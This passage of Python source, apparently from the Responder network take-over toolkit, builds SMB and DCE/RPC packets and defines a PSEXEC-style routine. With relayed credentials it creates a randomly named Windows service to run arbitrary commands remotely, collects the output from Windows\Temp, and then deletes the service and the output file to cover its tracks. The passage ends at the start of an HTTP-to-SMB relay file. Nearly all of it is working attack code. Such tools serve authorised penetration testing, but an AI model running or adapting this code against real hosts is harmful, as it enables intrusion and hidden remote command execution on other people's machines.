        CompletePacketLen = str(self.fields["wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["reserved"])+str(self.fields["andxoffset"])+str(self.fields["maxbuff"])+str(self.fields["maxmpx"])+str(self.fields["vcnum"])+str(self.fields["sessionkey"])+str(self.fields["securitybloblength"])+str(self.fields["reserved2"])+str(self.fields["capabilities"])+str(self.fields["bcc1"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])+str(self.fields["NLMPAuthMsgNull"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["ExtraNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanTerminator"])
        SecurityBlobLenUpdated = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])
        ## Packet len
        self.fields["andxoffset"] = struct.pack("<h", len(CompletePacketLen)+32) #SMB1 Header is always 32
        ##Buff Len
        self.fields["securitybloblength"] = struct.pack("<h", len(SecurityBlobLenUpdated))
        ##Complete Buff Len
        self.fields["bcc1"] = struct.pack("<h", len(CompletePacketLen)-27) #SessionSetup struct is 27.
 class SMBTreeConnectData(Packet):
    fields = OrderedDict([
        ("Wordcount", "\x04"),
        ("AndXCommand", "\xff"),
        ("Reserved","\x00" ),
        ("Andxoffset", "\x5a\x00"), 
        ("Flags","\x08\x00"),
        ("PasswdLen", "\x01\x00"),
        ("Bcc","\x2f\x00"),
        ("Passwd", "\x00"),
        ("Path","\\\\IPC$"),
        ("PathTerminator","\x00\x00"),
        ("Service","?????"),
        ("Terminator", "\x00"),
    ])
    def calculate(self): 
        ##Convert Path to Unicode first before any Len calc.
        self.fields["Path"] = self.fields["Path"].encode('utf-16le')
        ##Passwd Len
        self.fields["PasswdLen"] = struct.pack("<i", len(str(self.fields["Passwd"])))[:2]
        ##Packet len
        CompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Flags"])+str(self.fields["PasswdLen"])+str(self.fields["Bcc"])+str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
        self.fields["Andxoffset"] = struct.pack("<i", len(CompletePacket)+32)[:2]
        ##Bcc Buff Len
        BccComplete    = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
        self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
 class SMBNTCreateData(Packet):
    fields = OrderedDict([
        ("Wordcount",     "\x18"),
        ("AndXCommand",   "\xff"),
        ("Reserved",      "\x00" ),
        ("Andxoffset",    "\x00\x00"),
        ("Reserved2",     "\x00"),
        ("FileNameLen",   "\x07\x00"),
        ("CreateFlags",   "\x16\x00\x00\x00"),
        ("RootFID",       "\x00\x00\x00\x00"),
        ("AccessMask",    "\x00\x00\x00\x02"),
        ("AllocSize",     "\x00\x00\x00\x00\x00\x00\x00\x00"),
        ("FileAttrib",    "\x00\x00\x00\x00"),
        ("ShareAccess",   "\x07\x00\x00\x00"),
        ("Disposition",   "\x01\x00\x00\x00"),   
        ("CreateOptions", "\x00\x00\x00\x00"),
        ("Impersonation", "\x02\x00\x00\x00"),
        ("SecurityFlags", "\x00"),
        ("Bcc",           "\x08\x00"),
        ("FileName",      "\\svcctl"),
        ("FileNameNull",  "\x00"),
    ])
    def calculate(self):
        Data1= str(self.fields["FileName"])+str(self.fields["FileNameNull"])
        self.fields["FileNameLen"] = struct.pack("<h",len(str(self.fields["FileName"])))
        self.fields["Bcc"] = struct.pack("<h",len(Data1))
 class SMBReadData(Packet):
    fields = OrderedDict([
        ("Wordcount",     "\x0a"),
        ("AndXCommand",   "\xff"),
        ("Reserved",      "\x00" ),
        ("Andxoffset",    "\x00\x00"),
        ("FID",           "\x00\x00"),
        ("Offset",        "\x19\x03\x00\x00"), 
        ("MaxCountLow",   "\xed\x01"),
        ("MinCount",      "\xed\x01"),
        ("Hidden",        "\xff\xff\xff\xff"),
        ("Remaining",     "\x00\x00"),  
        ("Bcc",           "\x00\x00"),
        ("Data", ""),
    ])
    def calculate(self):
        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
 class SMBWriteData(Packet):
    fields = OrderedDict([
        ("Wordcount",     "\x0e"),
        ("AndXCommand",   "\xff"),
        ("Reserved",      "\x00" ),
        ("Andxoffset",    "\x00\x00"),
        ("FID",           "\x06\x40"),
        ("Offset",        "\xea\x03\x00\x00"),
        ("Reserved2",     "\xff\xff\xff\xff"),
        ("WriteMode",     "\x08\x00"),
        ("Remaining",     "\xdc\x02"),
        ("DataLenHi",     "\x00\x00"),
        ("DataLenLow",    "\xdc\x02"),
        ("DataOffset",    "\x3f\x00"),
        ("HiOffset",      "\x00\x00\x00\x00"),   
        ("Bcc",           "\xdc\x02"),
        ("Data", ""),
    ])
    def calculate(self):
        self.fields["Remaining"] = struct.pack("<h",len(str(self.fields["Data"])))
        self.fields["DataLenLow"] = struct.pack("<h",len(str(self.fields["Data"])))
        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
 class SMBTransDCERPC(Packet):
    fields = OrderedDict([
        ("Wordcount",             "\x10"),
        ("TotalParamCount",       "\x00\x00"),
        ("TotalDataCount",        "\x00\x00" ),
        ("MaxParamCount",         "\x00\x00"),
        ("MaxDataCount",          "\x00\x04"),
        ("MaxSetupCount",         "\x00"),
        ("Reserved",              "\x00\x00"),
        ("Flags",                 "\x00"),
        ("Timeout",               "\x00\x00\x00\x00"),
        ("Reserved1",             "\x00\x00"),
        ("ParamCount",            "\x00\x00"),
        ("ParamOffset",           "\x00\x00"),
        ("DataCount",             "\x00\x00"),
        ("DataOffset",            "\x00\x00"),
        ("SetupCount",            "\x02"),
        ("Reserved2",             "\x00"),
        ("OpNum",                 "\x26\x00"),
        ("FID",                   "\x00\x00"),
        ("Bcc",                   "\x00\x00"),
        ("Terminator",            "\x00"),
        ("PipeName",              "\\PIPE\\"),
        ("PipeTerminator",        "\x00\x00"),
        ("Data", ""),
    ])
    def calculate(self):
        #Padding
        if len(str(self.fields["Data"]))%2==0:
           self.fields["PipeTerminator"] = "\x00\x00\x00\x00"
        else:
           self.fields["PipeTerminator"] = "\x00\x00\x00"
        ##Convert Path to Unicode first before any Len calc.
        self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le')
        ##Data Len
        self.fields["TotalDataCount"] = struct.pack("<h", len(str(self.fields["Data"])))
        self.fields["DataCount"] = struct.pack("<h", len(str(self.fields["Data"])))
        ##Packet len
        FindRAPOffset = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved1"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved2"])+str(self.fields["OpNum"])+str(self.fields["FID"])+str(self.fields["Bcc"])+str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])
        self.fields["ParamOffset"] = struct.pack("<h", len(FindRAPOffset)+32)
        self.fields["DataOffset"] = struct.pack("<h", len(FindRAPOffset)+32)
        ##Bcc Buff Len
        BccComplete    = str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])+str(self.fields["Data"])
        self.fields["Bcc"] = struct.pack("<h", len(BccComplete))
 class SMBDCEData(Packet):
    fields = OrderedDict([
        ("Version",       "\x05"),
        ("VersionLow",    "\x00"),
        ("PacketType",    "\x0b"),
        ("PacketFlag",    "\x03"),
        ("DataRepresent", "\x10\x00\x00\x00"),
        ("FragLen",       "\x2c\x02"),
        ("AuthLen",       "\x00\x00"),
        ("CallID",        "\x00\x00\x00\x00"),
        ("MaxTransFrag",  "\xd0\x16"),
        ("MaxRecvFrag",   "\xd0\x16"),
        ("GroupAssoc",    "\x00\x00\x00\x00"),
        ("CTXNumber",     "\x01"),
        ("CTXPadding",    "\x00\x00\x00"),
        ("CTX0ContextID",  "\x00\x00"),
        ("CTX0ItemNumber", "\x01\x00"),
        ("CTX0UID", "\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03"),
        ("CTX0UIDVersion", "\x02\x00"),
        ("CTX0UIDVersionlo","\x00\x00"),
        ("CTX0UIDSyntax",   "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60"),
        ("CTX0UIDSyntaxVer","\x02\x00\x00\x00"),
    ])
    def calculate(self):
        Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["MaxTransFrag"])+str(self.fields["MaxRecvFrag"])+str(self.fields["GroupAssoc"])+str(self.fields["CTXNumber"])+str(self.fields["CTXPadding"])+str(self.fields["CTX0ContextID"])+str(self.fields["CTX0ItemNumber"])+str(self.fields["CTX0UID"])+str(self.fields["CTX0UIDVersion"])+str(self.fields["CTX0UIDVersionlo"])+str(self.fields["CTX0UIDSyntax"])+str(self.fields["CTX0UIDSyntaxVer"])
        self.fields["FragLen"] = struct.pack("<h",len(Data1))
 class SMBDCEPacketData(Packet):
    fields = OrderedDict([
        ("Version",       "\x05"),
        ("VersionLow",    "\x00"),
        ("PacketType",    "\x00"),
        ("PacketFlag",    "\x03"),
        ("DataRepresent", "\x10\x00\x00\x00"),
        ("FragLen",       "\x00\x00"),
        ("AuthLen",       "\x00\x00"),
        ("CallID",        "\x00\x00\x00\x00"),
        ("AllocHint",     "\x00\x00\x00\x00"),
        ("ContextID",     "\x00\x00"),
        ("Opnum",         "\x0f\x00"),
        ("Data",          ""),
    ])
    def calculate(self):
        Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["AllocHint"])+str(self.fields["ContextID"])+str(self.fields["Opnum"])+str(self.fields["Data"])
        self.fields["FragLen"] = struct.pack("<h",len(Data1))
        self.fields["AllocHint"] = struct.pack("<i",len(str(self.fields["Data"])))
 class SMBDCESVCCTLOpenManagerW(Packet):
    fields = OrderedDict([
        ("MachineNameRefID",     "\xb5\x97\xb9\xbc"),
        ("MaxCount",             "\x0f\x00\x00\x00"),
        ("Offset",               "\x00\x00\x00\x00"),
        ("ActualCount",          "\x0f\x00\x00\x00"),
        ("MachineName",          ""),
        ("MachineNameNull",      "\x00\x00"),
        ("DbPointer",            "\x00\x00\x00\x00"),
        ("AccessMask",           "\x3f\x00\x0f\x00"),
    ])
    def calculate(self):
        ## Convert to UTF-16LE
        self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["MachineName"]))+1)
        self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["MachineName"]))+1)
        self.fields["MachineName"] = self.fields["MachineName"].encode('utf-16le')
 class SMBDCESVCCTLCreateService(Packet):
    fields = OrderedDict([
        ("ContextHandle",        ""),
        ("MaxCount",             "\x0c\x00\x00\x00"),
        ("Offset",               "\x00\x00\x00\x00"),
        ("ActualCount",          "\x0c\x00\x00\x00"),
        ("ServiceName",          "AyAGaxwLhCP"),
        ("MachineNameNull",      "\x00\x00"),
        ("ReferentID",           "\x00\x00\x02\x00"),
        ("MaxCountRefID",        "\x11\x00\x00\x00"),
        ("OffsetID",             "\x00\x00\x00\x00"),
        ("ActualCountRefID",     "\x11\x00\x00\x00"),
        ("DisplayNameID",        "DhhUFcsvrfJvLwRq"),
        ("DisplayNameIDNull",    "\x00\x00\x00\x00"),
        ("AccessMask",           "\xff\x01\x0f\x00"),
        ("ServerType",           "\x10\x01\x00\x00"),
        ("ServiceStartType",     "\x03\x00\x00\x00"),
        ("ServiceErrorCtl",      "\x00\x00\x00\x00"),
        ("BinPathMaxCount",      "\xb6\x00\x00\x00"),
        ("BinPathOffset",        "\x00\x00\x00\x00"),
        ("BinPathActualCount",   "\xb6\x00\x00\x00"),
        ("FileName",             ""),
        ("BinPathName",          ""),
        ("BinCMD",               ""),
        ("BintoEnd",             ""),
        ("BinCMDTerminator",     "\x00\x00"),
        ("LoadOrderGroup",       "\x00\x00\x00\x00"),
        ("TagID",                "\x00\x00\x00\x00"),
        ("Dependencies",         "\x00\x00\x00\x00"),
        ("DependenciesLen",      "\x00\x00\x00\x00"),
        ("ServiceStartName",     "\x00\x00\x00\x00"),
        ("Password",             "\x00\x00\x00\x00"),
        ("PasswordLen",          "\x00\x00\x00\x00"), 
        ("Padding",              "\x00\x00"),
    ])
    def calculate(self):
        self.fields["BinCMD"] = self.fields["BinCMD"].replace("&", "^&")#Filtering
        self.fields["BinCMD"] = self.fields["BinCMD"].replace("(", "^(")#Filtering
        self.fields["BinCMD"] = self.fields["BinCMD"].replace(")", "^)")#Filtering
        self.fields["BinCMD"] = self.fields["BinCMD"].replace("%", "^%")#Filtering
        self.fields["BinCMD"] = self.fields["BinCMD"].replace(">", "^>")#Filtering
        self.fields["BinCMD"] = self.fields["BinCMD"].replace(">", "^>")#Filtering
        self.fields["BinCMD"] = self.fields["BinCMD"].replace("|", "^|")#Filtering
        self.fields["BinCMD"] = self.fields["BinCMD"].replace(",", "^,")#Filtering
        self.fields["BinCMD"] = self.fields["BinCMD"].replace("$", "^$")#Filtering
        self.fields["BinCMD"] = self.fields["BinCMD"].replace("!", "^!")#Filtering
        self.fields["BinCMD"] = self.fields["BinCMD"].replace(",", "^,")#Filtering
        self.fields["BinCMD"] = self.fields["BinCMD"].replace("'", "^'")#Filtering
        self.fields["BinCMD"] = self.fields["BinCMD"].replace("\"", "^\"")#Filtering
        File = "%WINDIR%\\Temp\\"+self.fields["FileName"]
        WinTmpPath = "%WINDIR%\\Temp\\Results.txt"
        CleanService = "sc delete "+self.fields["ServiceName"]+"^&"#Start by deleting the service..then run the cmd.
        FinalCMD = CleanService+"del /F /Q "+File+"^&"+self.fields["BinCMD"]+" ^>"+WinTmpPath+" >"+File
        #That is: delete service we just ran, delete the bat file (it's loaded in memory, no pb), echo original cmd into random .bat file, run .bat file.
        self.fields["FileName"] = ""#Reset it.
        self.fields["BinPathName"] = "%COMSPEC% /C echo "#make sure to escape "&" when using echo.
        self.fields["BinCMD"] = FinalCMD
        self.fields["BintoEnd"] = "& %COMSPEC% /C "+File
        BinDataLen = str(self.fields["BinPathName"])+str(self.fields["BinCMD"])+str(self.fields["BintoEnd"])
        ## Calculate first
        self.fields["BinPathMaxCount"] = struct.pack("<i",len(BinDataLen)+1)
        self.fields["BinPathActualCount"] = struct.pack("<i",len(BinDataLen)+1)
        self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
        self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
        self.fields["MaxCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
        self.fields["ActualCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
        ## Then convert to UTF-16LE, yeah it's weird..
        self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
        self.fields["DisplayNameID"] = self.fields["DisplayNameID"].encode('utf-16le')
        self.fields["BinPathName"] = self.fields["BinPathName"].encode('utf-16le')
        self.fields["BinCMD"] = self.fields["BinCMD"].encode('utf-16le')
        self.fields["BintoEnd"] = self.fields["BintoEnd"].encode('utf-16le')
 class SMBDCESVCCTLOpenService(Packet):
    fields = OrderedDict([
        ("ContextHandle",        ""),
        ("MaxCount",             "\x00\x00\x00\x00"),
        ("Offset",               "\x00\x00\x00\x00"),
        ("ActualCount",          "\x00\x00\x00\x00"),
        ("ServiceName",          ""),
        ("MachineNameNull",      "\x00\x00"),
        ("AccessMask",           "\xff\x01\x0f\x00"),
    ])
    def calculate(self):
        ## Calculate first
        self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
        self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
        ## Then convert to UTF-16LE, yeah it's weird..
        self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
 class SMBDCESVCCTLStartService(Packet):
    fields = OrderedDict([
        ("ContextHandle",        ""),
        ("MaxCount",             "\x00\x00\x00\x00\x00\x00\x00\x00"),
    ])
 class OpenAndX(Packet):
    fields = OrderedDict([
        ("Wordcount",             "\x0f"),
        ("AndXCommand",           "\xff"),
        ("Reserved",              "\x00" ),
        ("Andxoffset",            "\x00\x00"),
        ("Flags",                 "\x07\x00"),
        ("DesiredAccess",         "\xc2\x00"),
        ("SearchAttrib",          "\x16\x00"),
        ("FileAttrib",            "\x20\x00"),
        ("Created",               "\x40\x9d\xc1\x57"),
        ("OpenFunc",              "\x12\x00"),
        ("allocsize",             "\x00\x00\x00\x00"),
        ("Timeout",               "\x00\x00\x00\x00"),
        ("Reserved2",             "\x00\x00\x00\x00"),
        ("Bcc",                   "\x0b\x00"),
        ("Terminator",            ""),
        ("File",                  "\\hola.txt"),
        ("FileNull",              "\x00"),#00 00
    ])
    def calculate(self):
        #self.fields["File"] = self.fields["File"].encode('utf-16le')
        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Terminator"])+str(self.fields["File"])+str(self.fields["FileNull"])))
 class ReadRequest(Packet):
    fields = OrderedDict([
        ("Wordcount",             "\x05"),
        ("FID",                   "\x02\x40"),
        ("Count",                 "\xf0\xff"),
        ("Offset",                "\x00\x00\x00\x00"),
        ("RemainingBytes",        "\xf0\xff"),
        ("Bcc",                   "\x00\x00"),
    ])
 class ReadRequestAndX(Packet):
    fields = OrderedDict([
        ("Wordcount",             "\x0C"),
        ("AndXCommand",           "\xff"),
        ("Reserved",              "\x00"),
        ("AndXOffset",            "\xde\xde"),#
        ("FID",                   "\x02\x40"),
        ("Offset",                "\x00\x00\x00\x00"),
        ("MaxCountLow",           "\xf0\xff"),
        ("MinCount",              "\xf0\xff"),
        ("Timeout",               "\xff\xff\xff\xff"),
        ("RemainingBytes",        "\xf0\xff"),
        ("HighOffset",            "\x00\x00\x00\x00"),
        ("Bcc",                   "\x00\x00"),
    ])
 class CloseRequest(Packet):
    fields = OrderedDict([
        ("Wordcount",             "\x03"),
        ("FID",                   "\x00\x00"),
        ("LastWrite",             "\xff\xff\xff\xff"),
        ("Bcc",                   "\x00\x00"),
    ])
 class DeleteFileRequest(Packet):
    fields = OrderedDict([
        ("Wordcount",             "\x01"),
        ("SearchAttributes",      "\x06\x00"),
        ("Bcc",                   "\x1b\x00"),
        ("BuffType",              "\x04"),
        ("File",                  ""),
        ("FileNull",              "\x00\x00"),
    ])
    def calculate(self):
        self.fields["File"] = self.fields["File"].encode('utf-16le')
        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["BuffType"])+str(self.fields["File"])+str(self.fields["FileNull"])))
 class SMBEcho(Packet):
    fields = OrderedDict([
        ("Wordcount",             "\x01"),
        ("EchoCount",             "\x01\x00"),
        ("Bcc",                   "\x1b\x00"),
        ("File",                  "LWO CW VLO DEO MAW LMW ARW"),#nt4 style.
        ("FileNull",              "\x00"),
    ])
 ###########################PSEXEC#############################################
 def ExtractCommandOutput(data):
    DataLen = struct.unpack("<H", data[61:63])[0]
    Output = data[63:63+DataLen]
    return Output
 def SMBReadRecv(s):
    Completedata=[]
    data=''
    Start=time.time()
    s.setblocking(0)
    while 1:
        if Completedata and time.time()-Start > 0.5:#Timeout
            break
        try:
            data = s.recv(1024)
            if data:
                Completedata.append(data)
                Start=time.time()
            else:
                break
        except:
            pass
    s.setblocking(1)
    return s, ''.join(Completedata)
 def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
    if data == None:
        return False
    head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x05\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
    t = SMBNTCreateData()
    t.calculate()
    packet0 = str(head)+str(t)
    buffer1 = longueur(packet0)+packet0
    s.send(buffer1)
    data = s.recv(2048)
    ## Fail Handling.
    if data[8:10] == "\xa2\x22":
        print "[+] NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation.\n"
        return False
    ## DCE/RPC Write.
    if data[8:10] == "\xa2\x00":
        head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
        x = SMBDCEData()
        x.calculate()
        f = data[42:44]
        t = SMBWriteData(FID=f,Data=x)
        t.calculate()
        packet0 = str(head)+str(t)
        buffer1 = longueur(packet0)+packet0
        s.send(buffer1)
        data = s.recv(2048)
    ## DCE/RPC Read.
    if data[8:10] == "\x2f\x00":
            head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
            t = SMBReadData(FID=f,MaxCountLow="\x00\x04", MinCount="\x00\x04",Offset="\x00\x00\x00\x00")
            t.calculate()
            packet0 = str(head)+str(t)
            buffer1 = longueur(packet0)+packet0
            s.send(buffer1)
            data = s.recv(2048)
            ## DCE/RPC SVCCTLOpenManagerW.
            if data[8:10] == "\x2e\x00":
                head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=Host[0])
                w.calculate()
                x = SMBDCEPacketData(Data=w)
                x.calculate()
                t = SMBTransDCERPC(FID=f,Data=x)
                t.calculate()
                packet0 = str(head)+str(t)
                buffer1 = longueur(packet0)+packet0
                s.send(buffer1)
                data = s.recv(2048)
                ##Error handling.
                if data[8:10] == "\x2e\x00":
                    if data[len(data)-4:] == "\x05\x00\x00\x00":
                        print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
                        return False
                ## DCE/RPC Create Service.
                if data[8:10] == "\x25\x00":
                    ContextHandler = data[84:104]
                    ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)])
                    ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
                    FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat'
                    FilePath = FileChars
                    head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                    w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler, ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars, FileName=FilePath,BinCMD=Command)
                    w.calculate()
                    x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
                    x.calculate()
                    t = SMBTransDCERPC(FID=f,Data=x)
                    t.calculate()
                    packet0 = str(head)+str(t)
                    buffer1 = longueur(packet0)+packet0
                    s.send(buffer1)
                    data = s.recv(2048)
                    #print "[+] Creating service"
                    ## DCE/RPC SVCCTLOpenService.
                    if data[8:10] == "\x25\x00":
                        if data[len(data)-4:] == "\x05\x00\x00\x00":
                            print "[+] Failed to create the service\n"
                            return False
                        #print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars)
                        head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                        w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
                        w.calculate()
                        x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
                        x.calculate()
                        t = SMBTransDCERPC(FID=f,Data=x)
                        t.calculate()
                        packet0 = str(head)+str(t)
                        buffer1 = longueur(packet0)+packet0
                        s.send(buffer1)
                        data = s.recv(2048)
                        ## DCE/RPC SVCCTLStartService.
                        if data[8:10] == "\x25\x00":
                            if data[len(data)-4:] == "\x05\x00\x00\x00":
                                print "[+] Failed to open the service.\n"
                                return False
                            ContextHandler = data[84:104]
                            head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                            w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
                            x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
                            x.calculate()
                            t = SMBTransDCERPC(FID=f,Data=x)
                            t.calculate()
                            packet0 = str(head)+str(t)
                            buffer1 = longueur(packet0)+packet0
                            s.send(buffer1)
                            data = s.recv(2048)
    ##Tree connect c$
    if data[8:10] == "\x25\x00":
       if data[len(data)-4:] == "\x05\x00\x00\x00":
           print "[+] Failed to start the service.\n"
           return False
       #print "[+] Command executed, grabbing output now."
       Logs.info('Command executed:')
       Logs.info(clientIP+","+Username+','+Command)
       #print "[+] Removing service.\n[+] Cleaning up output file.\n"
       head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
       t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\C$")
       t.calculate()
       packet1 = str(head)+str(t)
       buffer1 = longueur(packet1)+packet1
       s.send(buffer1)
       data = s.recv(2048)
       ##OpenAndX.
       if data[8:10] == "\x75\x00":
          head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
          t = OpenAndX(File="\\Windows\\Temp\\Results.txt", OpenFunc="\x01\x00")
          t.calculate()
          packet1 = str(head)+str(t)
          buffer1 = longueur(packet1)+packet1  
          s.send(buffer1)
          data = s.recv(2048)
          ##OpenAndX.
          if data[8:10] == "\x2d\x34":
             time.sleep(1)#not found, maybe still processing the cmd. Wait a bit.
             head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
             t = OpenAndX(File="\\Windows\\Temp\\Results.txt", OpenFunc="\x01\x00")
             t.calculate()
             packet1 = str(head)+str(t)
             buffer1 = longueur(packet1)+packet1  
             s.send(buffer1)
             data = s.recv(2048)
          ##OpenAndX.
          if data[8:10] == "\x2d\x34":
             time.sleep(1)#not found, command failed.
             print "[+] The command failed."
             return data
    ##ReadRequest.
    ## Need grab the size from Open And X and do it properly later. For now, only 65535 bytes printed.
    if data[8:10] == "\x2d\x00":
       ReturnedFID = data[41:43]
       head = SMBHeader(cmd="\x2e",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x12\x00")
       t = ReadRequestAndX(FID=ReturnedFID)
       packet1 = str(head)+str(t)
       buffer1 = longueur(packet1)+packet1  
       s.send(buffer1)
       s, data = SMBReadRecv(s)
       #print "[+] Output:\n"
       print ExtractCommandOutput(data)
       ##Close Request
       if data[8:10] == "\x2e\x00":
          head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
          t = CloseRequest(FID = ReturnedFID)
          packet1 = str(head)+str(t)
          buffer1 = longueur(packet1)+packet1  
          s.send(buffer1)
          data = s.recv(2048)
    ##DeleteFileRequest.
    if data[8:10] == "\x04\x00":
       head = SMBHeader(cmd="\x06",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x13\x00")
       t = DeleteFileRequest(File="\\Windows\\Temp\\Results.txt")
       t.calculate()
       packet1 = str(head)+str(t)
       buffer1 = longueur(packet1)+packet1  
       #print "[+] Deleting file now."
       s.send(buffer1)
       data = s.recv(2048)
    if data[8:10] == "\x06\x00":
       #print "[+] File deleted, making sure it's not there anymore.." 
       head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
       t = OpenAndX(File="\\Windows\\Temp\\Results.txt", OpenFunc="\x01\x00")
       t.calculate()
       packet1 = str(head)+str(t)
       buffer1 = longueur(packet1)+packet1  
       s.send(buffer1)
       data = s.recv(2048)
       return data
--- a/tools/RelayHTTPSMB/HTTPToSMBRelay.py
+++ b/tools/RelayHTTPSMB/HTTPToSMBRelay.py
@@ -0,0 +1,378 @@
 #!/usr/bin/env python
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
